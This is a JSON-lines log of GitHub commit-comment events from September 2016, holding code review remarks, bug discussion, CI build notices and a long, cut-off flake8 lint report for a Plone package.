{"id":"4588226238","type":"CommitCommentEvent","actor":{"login":"dukeboard"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19092671,"position":null,"line":null,"path":null,"commit_id":"6398a766929c4ccb1d3a11f71cb5544f939f99c5","created_at":"2016-09-20T08:35:46Z","updated_at":"2016-09-20T08:35:46Z","body":"In this way should be already fine . And setter is protected already. But you're right we should define a number  compatibility globally"}},"created_at":"2016-09-20T08:35:46Z"}
{"id":"4588227148","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092673,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T08:35:57Z","updated_at":"2016-09-20T08:35:57Z","body":"I had not forgotten AR ( and other resolutions): I even tested them before committing.\r\nIf this would really be an issue, AR could not be used for any skin apart from ViX-HD, as they all have fixed locations.\r\nThe reason that there is no problem, is that the OSD is always scaled (correctly) to the actual output resolution (whether fixed or changing i.a.w. the input resolution)."}},"created_at":"2016-09-20T08:35:57Z"}
{"id":"4588231117","type":"CommitCommentEvent","actor":{"login":"gavruskin"},"repo":{"name":"gavruskin/fitlands"},"payload":{"comment":{"id":19092686,"position":null,"line":null,"path":null,"commit_id":"ffd9b80d9a8d7c93cdcca26f676937a13f760110","created_at":"2016-09-20T08:36:47Z","updated_at":"2016-09-20T08:36:47Z","body":"Oops, this of course is not a minor commit. The message should be:\r\n> added support for circuit names as in BPS[2007]"}},"created_at":"2016-09-20T08:36:47Z"}
{"id":"4588231633","type":"CommitCommentEvent","actor":{"login":"m-g-sonar"},"repo":{"name":"SonarSource/sonar-examples"},"payload":{"comment":{"id":19092692,"position":1,"line":1,"path":"plugins/java-custom-rules/src/main/resources/org/sonar/l10n/java/rules/mycompany/AvoidMethodDeclaration.html","commit_id":"21f3650044656e12494e2b19fab0c28a6ba9b8af","created_at":"2016-09-20T08:36:54Z","updated_at":"2016-09-20T08:36:54Z","body":"should be `<p>My stupid rule to avoid method declaration</p>` "}},"created_at":"2016-09-20T08:36:54Z"}
{"id":"4588234092","type":"CommitCommentEvent","actor":{"login":"assaad"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19092695,"position":null,"line":null,"path":null,"commit_id":"6398a766929c4ccb1d3a11f71cb5544f939f99c5","created_at":"2016-09-20T08:37:27Z","updated_at":"2016-09-20T08:37:27Z","body":"Or maybe in the math engine, we should add int() and long() as math functions :) "}},"created_at":"2016-09-20T08:37:27Z"}
{"id":"4588234207","type":"CommitCommentEvent","actor":{"login":"m-g-sonar"},"repo":{"name":"SonarSource/sonar-examples"},"payload":{"comment":{"id":19092696,"position":2,"line":2,"path":"plugins/java-custom-rules/src/main/resources/org/sonar/l10n/java/rules/mycompany/AvoidMethodDeclaration.json","commit_id":"21f3650044656e12494e2b19fab0c28a6ba9b8af","created_at":"2016-09-20T08:37:28Z","updated_at":"2016-09-20T08:37:28Z","body":"should be `\"Avoid method declarations\"`"}},"created_at":"2016-09-20T08:37:28Z"}
{"id":"4588239325","type":"CommitCommentEvent","actor":{"login":"DosoIT"},"repo":{"name":"NoomAttapon/MSU-PART-TIME"},"payload":{"comment":{"id":19092700,"position":4,"line":68,"path":"resources/views/welcome.blade.php","commit_id":"f7315d8686f2096f7bf58dced8722d0ef30fe566","created_at":"2016-09-20T08:38:35Z","updated_at":"2016-09-20T08:38:35Z","body":"**เฮาทดสอบเด้อ**"}},"created_at":"2016-09-20T08:38:35Z"}
{"id":"4588241766","type":"CommitCommentEvent","actor":{"login":"NoomAttapon"},"repo":{"name":"NoomAttapon/MSU-PART-TIME"},"payload":{"comment":{"id":19092705,"position":4,"line":68,"path":"resources/views/welcome.blade.php","commit_id":"f7315d8686f2096f7bf58dced8722d0ef30fe566","created_at":"2016-09-20T08:39:08Z","updated_at":"2016-09-20T08:39:08Z","body":"No"}},"created_at":"2016-09-20T08:39:08Z"}
{"id":"4588242207","type":"CommitCommentEvent","actor":{"login":"TheSidSpears"},"repo":{"name":"TheSidSpears/FileHosting"},"payload":{"comment":{"id":19092706,"position":null,"line":null,"path":null,"commit_id":"f2ae9beee3d3c121badaba7e19b54a3844f6319e","created_at":"2016-09-20T08:39:13Z","updated_at":"2016-09-20T08:39:13Z","body":"Автозагрузчик drug'n'drop: upload-master\r\nОписание к файлу добавляется сразу после автозагрузки в отдельной форме\r\nСчетчик загрузчиков\r\n\r\nВ прочессе: настройка загрузки файлов через XSendFile"}},"created_at":"2016-09-20T08:39:13Z"}
{"id":"4588243030","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":19092711,"position":16,"line":16,"path":"public/app/pt.config.js","commit_id":"d97b23bc6714c60bc11fa8326e01ea2a823dfe93","created_at":"2016-09-20T08:39:24Z","updated_at":"2016-09-20T08:39:24Z","body":"`$` sign says that services and providers are created not by you. So, developing angular apps we used to prepend `$` sign in the beginning of injection."}},"created_at":"2016-09-20T08:39:24Z"}
{"id":"4588243232","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19092712,"position":null,"line":null,"path":null,"commit_id":"10679136205c580ed445a2108532b538b6edfe5f","created_at":"2016-09-20T08:39:27Z","updated_at":"2016-09-20T08:39:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1057](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13590&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 241, ignored: 3 Build time: 00:09:57"}},"created_at":"2016-09-20T08:39:27Z"}
{"id":"4588245168","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":19092715,"position":19,"line":18,"path":"public/app/pt.config.js","commit_id":"d97b23bc6714c60bc11fa8326e01ea2a823dfe93","created_at":"2016-09-20T08:39:51Z","updated_at":"2016-09-20T08:39:51Z","body":"Move otherwise to tasks.route"}},"created_at":"2016-09-20T08:39:51Z"}
{"id":"4588245715","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19092716,"position":null,"line":null,"path":null,"commit_id":"49fe2426808e3ce869e9f18964d0b5d60022cfce","created_at":"2016-09-20T08:39:58Z","updated_at":"2016-09-20T08:39:58Z","body":"Sep 20, 2016\r\n\r\nInitial commit."}},"created_at":"2016-09-20T08:39:58Z"}
{"id":"4588247359","type":"CommitCommentEvent","actor":{"login":"gaaf"},"repo":{"name":"kamailio/kamailio"},"payload":{"comment":{"id":19092719,"position":null,"line":null,"path":null,"commit_id":"824407610509b00dd2aa15df96c354accb5991c5","created_at":"2016-09-20T08:40:17Z","updated_at":"2016-09-20T08:40:17Z","body":"I think there is some code missing to break out of the reconnect loop on success."}},"created_at":"2016-09-20T08:40:17Z"}
{"id":"4588256262","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19092734,"position":null,"line":null,"path":null,"commit_id":"5fc8caeb8b85d3996bd8e78eededaf894bde6254","created_at":"2016-09-20T08:42:10Z","updated_at":"2016-09-20T08:42:10Z","body":"Sep 20, 2016\r\n\r\nInitial commit."}},"created_at":"2016-09-20T08:42:10Z"}
{"id":"4588256392","type":"CommitCommentEvent","actor":{"login":"luxiaoqi"},"repo":{"name":"luxiaoqi/mql4"},"payload":{"comment":{"id":19092735,"position":null,"line":null,"path":null,"commit_id":"22862f4a384d53a4a2fd104b2f09b293fe88685f","created_at":"2016-09-20T08:42:11Z","updated_at":"2016-09-20T08:42:11Z","body":"where are you?"}},"created_at":"2016-09-20T08:42:11Z"}
{"id":"4588258546","type":"CommitCommentEvent","actor":{"login":"luxiaoqi"},"repo":{"name":"luxiaoqi/mql4"},"payload":{"comment":{"id":19092737,"position":null,"line":null,"path":null,"commit_id":"22862f4a384d53a4a2fd104b2f09b293fe88685f","created_at":"2016-09-20T08:42:39Z","updated_at":"2016-09-20T08:42:39Z","body":"where are you? two"}},"created_at":"2016-09-20T08:42:39Z"}
{"id":"4588260799","type":"CommitCommentEvent","actor":{"login":"luxiaoqi"},"repo":{"name":"luxiaoqi/mql4"},"payload":{"comment":{"id":19092743,"position":1,"line":1,"path":"text2","commit_id":"22862f4a384d53a4a2fd104b2f09b293fe88685f","created_at":"2016-09-20T08:43:08Z","updated_at":"2016-09-20T08:43:08Z","body":"text conent is  1."}},"created_at":"2016-09-20T08:43:08Z"}
{"id":"4588264154","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19092754,"position":5,"line":4,"path":"src/sass/buttons.sass","commit_id":"1c2789b0a52a305fd817d148d40abbded89888d9","created_at":"2016-09-20T08:43:50Z","updated_at":"2016-09-20T08:43:50Z","body":"This is making the text inside the buttons not to be vertically aligned"}},"created_at":"2016-09-20T08:43:50Z"}
{"id":"4588264408","type":"CommitCommentEvent","actor":{"login":"alexis-michaud"},"repo":{"name":"remyoudompheng/polyglossia"},"payload":{"comment":{"id":19092757,"position":null,"line":null,"path":null,"commit_id":"6a4818fda9a77f02359115d764ef0968f3249b49","created_at":"2016-09-20T08:43:55Z","updated_at":"2016-09-20T08:43:55Z","body":"Just as an additional comment about the reliability of the correction: this error was pointed out by a Vietnamese student who used LaTeX for a M.A. thesis. I'm not a native speaker of Vietnamese but I am an advanced user, I have lots of dictionaries at hand, and I'm finicky ;-) \r\nMany thanks in advance for integrating this correction to the master file."}},"created_at":"2016-09-20T08:43:55Z"}
{"id":"4588265862","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19092763,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T08:44:12Z","updated_at":"2016-09-20T08:44:12Z","body":"> if the data generator is able to give continous data stream at this frequency\r\n\r\nDoes it have a choice?"}},"created_at":"2016-09-20T08:44:12Z"}
{"id":"4588268165","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19092770,"position":null,"line":null,"path":null,"commit_id":"e6a38945e07cd6719e3a2b37db90d152a3d24431","created_at":"2016-09-20T08:44:40Z","updated_at":"2016-09-20T08:44:40Z","body":"Initial commit."}},"created_at":"2016-09-20T08:44:40Z"}
{"id":"4588268510","type":"CommitCommentEvent","actor":{"login":"kokoko3k"},"repo":{"name":"kokoko3k/higgins"},"payload":{"comment":{"id":19092776,"position":null,"line":null,"path":null,"commit_id":"7914be25a1e8a764dc16189eb233b3c3cf477c9e","created_at":"2016-09-20T08:44:44Z","updated_at":"2016-09-20T08:44:44Z","body":"You can patch it (: - P)\r\n"}},"created_at":"2016-09-20T08:44:44Z"}
{"id":"4588269814","type":"CommitCommentEvent","actor":{"login":"andyblac"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092781,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T08:44:59Z","updated_at":"2016-09-20T08:44:59Z","body":"imo, i have scaling does not do a good enough job when things close to edges, i.e. things can 1 or 2 pixels from edge due the formula in reducing and moving, that why use e- so is ALLWAYS what i want, i.e. infobar e-10 in vix the infobar is ALLWAYS 10 pixels from bottom wether it be SD or HD, is it was fixed SD would not be 10pixels but the formulation of the reduction so would be more like 7 pixels.\r\n\r\nAnyway the original crash is due to the plugin using DECIMALS in skins code somewhere, you can not have a decimal of a pixel sense the crash error\r\n\r\n```\r\n484.607> ValueError: invalid literal for int() with base 10: '1088.0'\r\n```\r\n\r\nso imo that should be fixed."}},"created_at":"2016-09-20T08:44:59Z"}
{"id":"4588272871","type":"CommitCommentEvent","actor":{"login":"Jeremylinkk"},"repo":{"name":"NoomAttapon/MSU-PART-TIME"},"payload":{"comment":{"id":19092786,"position":null,"line":null,"path":null,"commit_id":"009d30e5e562688691ef9de759db52e4b9758877","created_at":"2016-09-20T08:45:35Z","updated_at":"2016-09-20T08:45:35Z","body":"เยอะๆ"}},"created_at":"2016-09-20T08:45:35Z"}
{"id":"4588273498","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19092787,"position":2,"line":2,"path":"README.md","commit_id":"7d05bb04d7ef2d3197dc6946786ff098e0a5755f","created_at":"2016-09-20T08:45:43Z","updated_at":"2016-09-20T08:45:43Z","body":"GBGBB"}},"created_at":"2016-09-20T08:45:43Z"}
{"id":"4588273528","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19092788,"position":null,"line":null,"path":null,"commit_id":"973fb89365c38a9b4390d4f21572bb3269aa17ef","created_at":"2016-09-20T08:45:43Z","updated_at":"2016-09-20T08:45:43Z","body":"Initial commit."}},"created_at":"2016-09-20T08:45:43Z"}
{"id":"4588274830","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19092791,"position":87,"line":null,"path":"css/1_header.scss","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-20T08:45:59Z","updated_at":"2016-09-20T08:45:59Z","body":"done"}},"created_at":"2016-09-20T08:45:59Z"}
{"id":"4588277238","type":"CommitCommentEvent","actor":{"login":"3lvis"},"repo":{"name":"bakkenbaeck/pinboard-ios"},"payload":{"comment":{"id":19092795,"position":null,"line":null,"path":null,"commit_id":"f67d9b5f0961e8be7187e1ad7b887f9dc4c09d4f","created_at":"2016-09-20T08:46:30Z","updated_at":"2016-09-20T08:46:30Z","body":"What happened with feature branches :D"}},"created_at":"2016-09-20T08:46:30Z"}
{"id":"4588280744","type":"CommitCommentEvent","actor":{"login":"schnello"},"repo":{"name":"volkszaehler/volkszaehler.org"},"payload":{"comment":{"id":19092808,"position":null,"line":null,"path":null,"commit_id":"5f5d5fa701981b5690727befe3edd86c8df0589b","created_at":"2016-09-20T08:47:15Z","updated_at":"2016-09-20T08:47:15Z","body":"Hallo.\r\n\r\nScript ist leider defekt. Es wurde im Windows format abgespeichert. Abhilfe bringt ein einfach dos2unix\r\n\r\nGrüße"}},"created_at":"2016-09-20T08:47:15Z"}
{"id":"4588281107","type":"CommitCommentEvent","actor":{"login":"dtgDTGdtg"},"repo":{"name":"dtgDTGdtg/TestZ"},"payload":{"comment":{"id":19092810,"position":null,"line":null,"path":null,"commit_id":"fa825175767fd2a33bdac538452691ee5df1ccb8","created_at":"2016-09-20T08:47:20Z","updated_at":"2016-09-20T08:47:20Z","body":"Please accept!"}},"created_at":"2016-09-20T08:47:20Z"}
{"id":"4588282264","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19092812,"position":null,"line":null,"path":null,"commit_id":"7d05bb04d7ef2d3197dc6946786ff098e0a5755f","created_at":"2016-09-20T08:47:35Z","updated_at":"2016-09-20T08:47:35Z","body":"dsffds"}},"created_at":"2016-09-20T08:47:35Z"}
{"id":"4588286005","type":"CommitCommentEvent","actor":{"login":"butok"},"repo":{"name":"c1728p9/fnet-example"},"payload":{"comment":{"id":19092819,"position":null,"line":null,"path":null,"commit_id":"0560782d91120aaf1571c2637027bc50847c6c07","created_at":"2016-09-20T08:48:21Z","updated_at":"2016-09-20T08:48:21Z","body":"Ideally is to add FNET_CFG_CPU_MBEDOS parameter, which make FNET to use MbedOS HAL."}},"created_at":"2016-09-20T08:48:21Z"}
{"id":"4588286916","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19092821,"position":null,"line":null,"path":null,"commit_id":"7d05bb04d7ef2d3197dc6946786ff098e0a5755f","created_at":"2016-09-20T08:48:32Z","updated_at":"2016-09-20T08:48:32Z","body":">\r\n![Uploading QQ1.png…]()\r\n![qq2](https://cloud.githubusercontent.com/assets/15604580/18663675/0c1d6530-7f52-11e6-93f6-8570f42f7a3d.png)\r\n![Uploading QQ3.png…]()\r\n![Uploading QQ4.png…]()\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-20T08:48:32Z"}
{"id":"4588288315","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092823,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T08:48:50Z","updated_at":"2016-09-20T08:48:50Z","body":"Please try the updated skins yourself; I really can't find any issue. All screenies are exactly the same as before, no matter which resolution is used.\r\nAnd all distances from edges have been respected (unless I made a math error somewhere; if so that should be fixed of course)."}},"created_at":"2016-09-20T08:48:50Z"}
{"id":"4588288627","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19092824,"position":39,"line":39,"path":"migrations/20160912132241_create_risks_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-20T08:48:55Z","updated_at":"2016-09-20T08:48:55Z","body":"Sure, totally agree if this field is nullable. I suggested the true/false/null because the current migration sets that as `notNullable()`, so there's no \"null\" state."}},"created_at":"2016-09-20T08:48:55Z"}
{"id":"4588289763","type":"CommitCommentEvent","actor":{"login":"CxTest"},"repo":{"name":"CxTest/CxRepository"},"payload":{"comment":{"id":19092826,"position":null,"line":null,"path":null,"commit_id":"dc83cc8a4b4da3bba96765258bfa33a19adb1117","created_at":"2016-09-20T08:49:10Z","updated_at":"2016-09-20T08:49:10Z","body":"INTEGRATION TESTING_2016-09-20 11:48:20"}},"created_at":"2016-09-20T08:49:10Z"}
{"id":"4588294198","type":"CommitCommentEvent","actor":{"login":"jb3-2"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19092836,"position":null,"line":null,"path":null,"commit_id":"2dc50480528c35283f2dbffbbd76818faef32f89","created_at":"2016-09-20T08:50:04Z","updated_at":"2016-09-20T08:50:04Z","body":"Nach kurzer Besprechung mit JE setze ich diese Änderungen zurück (git revert 795b1b9e710253059fdfc56fe11efb92ff405dc1)"}},"created_at":"2016-09-20T08:50:04Z"}
{"id":"4588294663","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19092837,"position":null,"line":null,"path":null,"commit_id":"f2b01ef9de36cd7f9d0ce76ee278a7adb6641200","created_at":"2016-09-20T08:50:10Z","updated_at":"2016-09-20T08:50:10Z","body":"Initial commit."}},"created_at":"2016-09-20T08:50:10Z"}
{"id":"4588297281","type":"CommitCommentEvent","actor":{"login":"linhaosheng"},"repo":{"name":"linhaosheng/RedRidingHood"},"payload":{"comment":{"id":19092843,"position":4,"line":4,"path":"README.md","commit_id":"7d05bb04d7ef2d3197dc6946786ff098e0a5755f","created_at":"2016-09-20T08:50:43Z","updated_at":"2016-09-20T08:50:43Z","body":"![qq1](https://cloud.githubusercontent.com/assets/15604580/18663743/5a327206-7f52-11e6-8111-23e98ab2a28d.png)\r\n"}},"created_at":"2016-09-20T08:50:43Z"}
{"id":"4588298063","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":19092845,"position":null,"line":null,"path":null,"commit_id":"f794c35743767a2e0159dc55af0d487d37d2e88e","created_at":"2016-09-20T08:50:53Z","updated_at":"2016-09-20T08:50:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dCbVT1NbRPOUhDvpkBWWjA"}},"created_at":"2016-09-20T08:50:53Z"}
{"id":"4588301916","type":"CommitCommentEvent","actor":{"login":"CxTest"},"repo":{"name":"CxTest/CxRepository"},"payload":{"comment":{"id":19092853,"position":null,"line":null,"path":null,"commit_id":"dc83cc8a4b4da3bba96765258bfa33a19adb1117","created_at":"2016-09-20T08:51:42Z","updated_at":"2016-09-20T08:51:42Z","body":"INTEGRATION TESTING_2016-09-20 11:51:40"}},"created_at":"2016-09-20T08:51:42Z"}
{"id":"4588305000","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19092854,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T08:52:17Z","updated_at":"2016-09-20T08:52:17Z","body":"Rob, the plugin is sending a float value to the skin. Why is that? It is not possible to have 1/2 a pixel so why is the plugin sending a float?"}},"created_at":"2016-09-20T08:52:17Z"}
{"id":"4588306403","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":19092855,"position":null,"line":null,"path":null,"commit_id":"b5bb31b5c91ecbae5ea4eeef563f9dcc5d974948","created_at":"2016-09-20T08:52:35Z","updated_at":"2016-09-20T08:52:35Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.discussion/92/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:89:17: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/comment.py:77:28: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:170:40: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:172:30: S001 found %s formatter\nplone/app/discussion/comment.py:176:48: S001 found %s formatter\nplone/app/discussion/comment.py:209:14: D001 found declareProtected replace it with AccessControl.ClassSecurityInfo.protected\nplone/app/discussion/comment.py:245:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:254:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:263:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:272:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:298:21: Q000 Remove bad quotes.\nplone/app/discussion/contentrules.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/contentrules.py:18:5: E731 do not assign a lambda expression, use a def\nplone/app/discussion/contentrules.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:59:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:70:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:81:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:92:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/conversation.py:67:27: Q000 Remove bad quotes.\nplone/app/discussion/conversation.py:205:16: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:214:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:220:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:324:8: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:453:29: Q000 Remove bad quotes.\nplone/app/discussion/events.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/events.py:11:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:33:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:38:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:43:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/interfaces.py:135:17: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:161:65: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:247:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:262:21: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:280:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:284:23: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:291:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:308:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:390:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:394:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:398:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:402:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:406:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/patches.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/patches.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/testing.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:13:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:14:1: B901 blind except: statement\nplone/app/discussion/testing.py:15:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:66:14: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:78:10: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:81:10: Q000 Remove bad quotes.\nplone/app/discussion/tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/upgrades.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/upgrades.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/vocabularies.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:89:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:107:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:114:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:135:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:142:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:158:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:173:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:191:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:199:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:212:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:224:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:235:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:243:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:250:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:280:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:299:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:307:47: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:347:40: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:380:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:386:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:429:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:436:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:49: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:533:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:578:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comment.py:55:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:56:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:57:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:106:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:108:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:114:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:130:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:131:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:135:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:136:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:158:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:166:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:179:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:182:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:187:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:231:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:262:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:267:23: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:304:13: Q000 Remove bad 